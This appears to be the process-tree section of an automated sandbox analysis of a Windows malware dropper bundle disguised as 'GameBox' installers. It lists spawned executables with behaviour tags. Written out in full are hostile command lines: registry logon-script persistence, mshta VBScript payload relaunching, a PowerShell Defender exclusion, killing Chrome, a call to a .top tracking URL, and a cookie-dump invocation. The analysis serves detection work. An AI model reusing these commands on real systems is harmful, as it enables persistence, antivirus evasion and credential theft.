C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 11483⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5508
-
-
-
C:\Users\Admin\Documents\Z6X45YxttCTJi5IiQ4xPeFcp.exe"C:\Users\Admin\Documents\Z6X45YxttCTJi5IiQ4xPeFcp.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Users\Admin\Documents\ypc_aYtRkVH5vN8Wjb4PcQIC.exe"C:\Users\Admin\Documents\ypc_aYtRkVH5vN8Wjb4PcQIC.exe"2⤵
- Executes dropped EXE
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\is-6MEJ9.tmp\ypc_aYtRkVH5vN8Wjb4PcQIC.tmp"C:\Users\Admin\AppData\Local\Temp\is-6MEJ9.tmp\ypc_aYtRkVH5vN8Wjb4PcQIC.tmp" /SL5="$30296,138429,56832,C:\Users\Admin\Documents\ypc_aYtRkVH5vN8Wjb4PcQIC.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\is-2VT2V.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2VT2V.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
PID:5180 -
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
- Executes dropped EXE
PID:5460
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5492 -
C:\Users\Admin\AppData\Local\Temp\is-OKBSF.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-OKBSF.tmp\Inlog.tmp" /SL5="$30274,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5696 -
C:\Users\Admin\AppData\Local\Temp\is-25077.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-25077.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:6908
-
C:\Users\Admin\AppData\Local\Temp\is-AHM15.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-AHM15.tmp\Setup.tmp" /SL5="$104C0,17352269,721408,C:\Users\Admin\AppData\Local\Temp\is-25077.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7140 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:6404
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:4728
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:7808
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
- Checks computer location settings
PID:11044
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:10900
-
-
C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\vdi_compiler"9⤵PID:8784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\vdi_compiler.exe"10⤵PID:7648
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:5428
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5584 -
C:\Users\Admin\AppData\Local\Temp\is-HAGQN.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-HAGQN.tmp\WEATHER Manager.tmp" /SL5="$103A8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6596 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:7760
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5540 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:6944
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5680 -
C:\Users\Admin\AppData\Local\Temp\is-DDEHT.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-DDEHT.tmp\VPN.tmp" /SL5="$103C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵PID:5880
-
C:\Users\Admin\AppData\Local\Temp\is-K66K0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K66K0.tmp\Setup.exe" /silent /subid=7207⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\is-SEPUG.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SEPUG.tmp\Setup.tmp" /SL5="$104BE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-K66K0.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7156 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:2304
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
PID:7360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:8124
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7152
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:7452
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10212
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5708 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:7668
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:7948
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\is-H2NQU.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-H2NQU.tmp\MediaBurner2.tmp" /SL5="$20354,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6040 -
C:\Users\Admin\AppData\Local\Temp\is-V12MO.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-V12MO.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:5556 -
C:\Program Files\Reference Assemblies\CYBSCJRMYN\ultramediaburner.exe"C:\Program Files\Reference Assemblies\CYBSCJRMYN\ultramediaburner.exe" /VERYSILENT8⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\is-AP96E.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-AP96E.tmp\ultramediaburner.tmp" /SL5="$40296,281924,62464,C:\Program Files\Reference Assemblies\CYBSCJRMYN\ultramediaburner.exe" /VERYSILENT9⤵
- Suspicious use of FindShellTrayWindow
PID:4456 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6c-8734d-2e9-79a95-8ee8b2697d092\Sarybifipi.exe"C:\Users\Admin\AppData\Local\Temp\6c-8734d-2e9-79a95-8ee8b2697d092\Sarybifipi.exe"8⤵
- Checks computer location settings
PID:6796
-
-
C:\Users\Admin\AppData\Local\Temp\2e-ec1a7-fcd-a5b9a-acd8616c1c7b2\SHaeqelovaezhi.exe"C:\Users\Admin\AppData\Local\Temp\2e-ec1a7-fcd-a5b9a-acd8616c1c7b2\SHaeqelovaezhi.exe"8⤵PID:5688
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuaozndc.mti\GcleanerEU.exe /eufive & exit9⤵PID:8448
-
C:\Users\Admin\AppData\Local\Temp\kuaozndc.mti\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kuaozndc.mti\GcleanerEU.exe /eufive10⤵PID:8804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vff40gwj.vna\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:8644
-
C:\Users\Admin\AppData\Local\Temp\vff40gwj.vna\installer.exeC:\Users\Admin\AppData\Local\Temp\vff40gwj.vna\installer.exe /qn CAMPAIGN="654"10⤵PID:8460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn1lzy04.em3\ufgaa.exe & exit9⤵PID:8780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe & exit9⤵PID:9032
-
C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exeC:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe10⤵PID:8652
-
C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe"C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe" -q11⤵PID:8964
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paixgppb.v2n\gcleaner.exe /mixfive & exit9⤵PID:8376
-
C:\Users\Admin\AppData\Local\Temp\paixgppb.v2n\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\paixgppb.v2n\gcleaner.exe /mixfive10⤵PID:8624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\njukv4cu.k1t\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:9176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe /8-2222 & exit9⤵PID:7764
-
C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exeC:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe /8-222210⤵PID:4420
-
C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe"C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe" /8-222211⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:6844
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\4050658.exe"C:\Users\Admin\AppData\Roaming\4050658.exe"6⤵PID:5808
-
-
C:\Users\Admin\AppData\Roaming\5751915.exe"C:\Users\Admin\AppData\Roaming\5751915.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4920
-
-
C:\Users\Admin\AppData\Roaming\7898297.exe"C:\Users\Admin\AppData\Roaming\7898297.exe"6⤵PID:1116
-
-
C:\Users\Admin\AppData\Roaming\8735718.exe"C:\Users\Admin\AppData\Roaming\8735718.exe"6⤵PID:4624
-
-
C:\Users\Admin\AppData\Roaming\4024868.exe"C:\Users\Admin\AppData\Roaming\4024868.exe"6⤵PID:4588
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
PID:5892 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:6024
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:5952 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5952 -s 14966⤵
- Program crash
PID:6140
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:6008 -
C:\Users\Admin\Documents\NgLOP8plJ0LLaKc5bAQ81Aq9.exe"C:\Users\Admin\Documents\NgLOP8plJ0LLaKc5bAQ81Aq9.exe"6⤵PID:5664
-
C:\Users\Admin\AppData\Roaming\3369371.exe"C:\Users\Admin\AppData\Roaming\3369371.exe"7⤵PID:7256
-
-
C:\Users\Admin\AppData\Roaming\4626128.exe"C:\Users\Admin\AppData\Roaming\4626128.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:7492
-
-
C:\Users\Admin\AppData\Roaming\4765907.exe"C:\Users\Admin\AppData\Roaming\4765907.exe"7⤵PID:7600
-
-
C:\Users\Admin\AppData\Roaming\3710087.exe"C:\Users\Admin\AppData\Roaming\3710087.exe"7⤵PID:7900
-
-
-
C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"6⤵
- Suspicious use of SetThreadContext
PID:6168 -
C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5836
-
-
-
C:\Users\Admin\Documents\jeEY260TDbsX9nbKMwLGA5tW.exe"C:\Users\Admin\Documents\jeEY260TDbsX9nbKMwLGA5tW.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5468
-
-
C:\Users\Admin\Documents\zGLNEyqvsrPwyrl2xJ1GD9XS.exe"C:\Users\Admin\Documents\zGLNEyqvsrPwyrl2xJ1GD9XS.exe"6⤵PID:4388
-
-
C:\Users\Admin\Documents\oa49cpqZl5T5Pps5fyIxAXYu.exe"C:\Users\Admin\Documents\oa49cpqZl5T5Pps5fyIxAXYu.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6416
-
-
C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"6⤵PID:6384
-
C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"7⤵
- Modifies data under HKEY_USERS
PID:8436
-
-
-
C:\Users\Admin\Documents\rity0deC7PDwZJhnw7Fc0mi8.exe"C:\Users\Admin\Documents\rity0deC7PDwZJhnw7Fc0mi8.exe"6⤵PID:6520
-
-
C:\Users\Admin\Documents\dEkSjUJQJnS56H8UscLLwiNl.exe"C:\Users\Admin\Documents\dEkSjUJQJnS56H8UscLLwiNl.exe"6⤵PID:6804
-
-
C:\Users\Admin\Documents\5UGVE6RxDwIgDLlxhN_NPoX7.exe"C:\Users\Admin\Documents\5UGVE6RxDwIgDLlxhN_NPoX7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7128
-
-
C:\Users\Admin\Documents\29owIlFKn_c2PPR1UKwJaTQQ.exe"C:\Users\Admin\Documents\29owIlFKn_c2PPR1UKwJaTQQ.exe"6⤵PID:4676
-
-
C:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exe"C:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5816 -
C:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exeC:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exe7⤵PID:3252
-
-
-
C:\Users\Admin\Documents\oMAHejMtAEYE1VopeG9aj0Fc.exe"C:\Users\Admin\Documents\oMAHejMtAEYE1VopeG9aj0Fc.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5876
-
-
C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"6⤵
- Suspicious use of SetThreadContext
PID:6664 -
C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"7⤵PID:5800
-
-
-
C:\Users\Admin\Documents\EBPRzFXg8T9BBzxSv1xLJFze.exe"C:\Users\Admin\Documents\EBPRzFXg8T9BBzxSv1xLJFze.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6952
-
-
C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"6⤵PID:6336
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )7⤵PID:4160
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe" ) do taskkill -f -iM "%~NxA"8⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS9⤵PID:7884
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )10⤵PID:7656
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"11⤵PID:7616
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a10⤵
- Loads dropped DLL
PID:5336
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "QUcb0MLCfJadB1hL2n1385G0.exe"9⤵
- Kills process with taskkill
PID:7200
-
-
-
-
-
C:\Users\Admin\Documents\lY_jtOV2TW9e7n1ZnGcMZ4jD.exe"C:\Users\Admin\Documents\lY_jtOV2TW9e7n1ZnGcMZ4jD.exe"6⤵
- Loads dropped DLL
PID:6352
-
-
C:\Users\Admin\Documents\Q5ep13oDyQ6hngZglmGlIbyf.exe"C:\Users\Admin\Documents\Q5ep13oDyQ6hngZglmGlIbyf.exe"6⤵PID:4208
-
-
C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe"C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe"6⤵PID:4428
-
C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe"C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe" -q7⤵PID:6000
-
-
-
C:\Users\Admin\Documents\YjGkUXS79c6Yx83LaCcitF4i.exe"C:\Users\Admin\Documents\YjGkUXS79c6Yx83LaCcitF4i.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6880
-
-
C:\Users\Admin\Documents\EsfADqyWbd6YCX_UFaZLoNFY.exe"C:\Users\Admin\Documents\EsfADqyWbd6YCX_UFaZLoNFY.exe"6⤵PID:4992
-
-
C:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exe"C:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exe"6⤵
- Suspicious use of SetThreadContext
PID:5628 -
C:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exeC:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exe7⤵PID:7024
-
-
-
C:\Users\Admin\Documents\RtOchpiStj2VNfCQPyk1aEP2.exe"C:\Users\Admin\Documents\RtOchpiStj2VNfCQPyk1aEP2.exe"6⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\is-03C18.tmp\RtOchpiStj2VNfCQPyk1aEP2.tmp"C:\Users\Admin\AppData\Local\Temp\is-03C18.tmp\RtOchpiStj2VNfCQPyk1aEP2.tmp" /SL5="$303E2,138429,56832,C:\Users\Admin\Documents\RtOchpiStj2VNfCQPyk1aEP2.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\is-4TCIV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4TCIV.tmp\Setup.exe" /Verysilent8⤵PID:8168
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:7644 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:6548
-
-
-
-
-
-
C:\Users\Admin\Documents\lpfqOPuIJtcNciqgj3UVTK2o.exe"C:\Users\Admin\Documents\lpfqOPuIJtcNciqgj3UVTK2o.exe"6⤵
- Loads dropped DLL
PID:6560
-
-
C:\Users\Admin\Documents\zMdSX4KZtAxNi0LAuHwhEANS.exe"C:\Users\Admin\Documents\zMdSX4KZtAxNi0LAuHwhEANS.exe"6⤵PID:6396
-
-
C:\Users\Admin\Documents\3n0HF9KJeevpkrlw2ARDvFPN.exe"C:\Users\Admin\Documents\3n0HF9KJeevpkrlw2ARDvFPN.exe"6⤵PID:6992
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\3N0HF9~1.DLL,s C:\Users\Admin\DOCUME~1\3N0HF9~1.EXE7⤵
- Loads dropped DLL
PID:10152 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\3N0HF9~1.DLL,SjUVOTg18⤵
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:2192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\3N0HF9~1.DLL9⤵PID:5804
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵
- Executes dropped EXE
PID:4732
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5144 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
PID:5776
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Loads dropped DLL
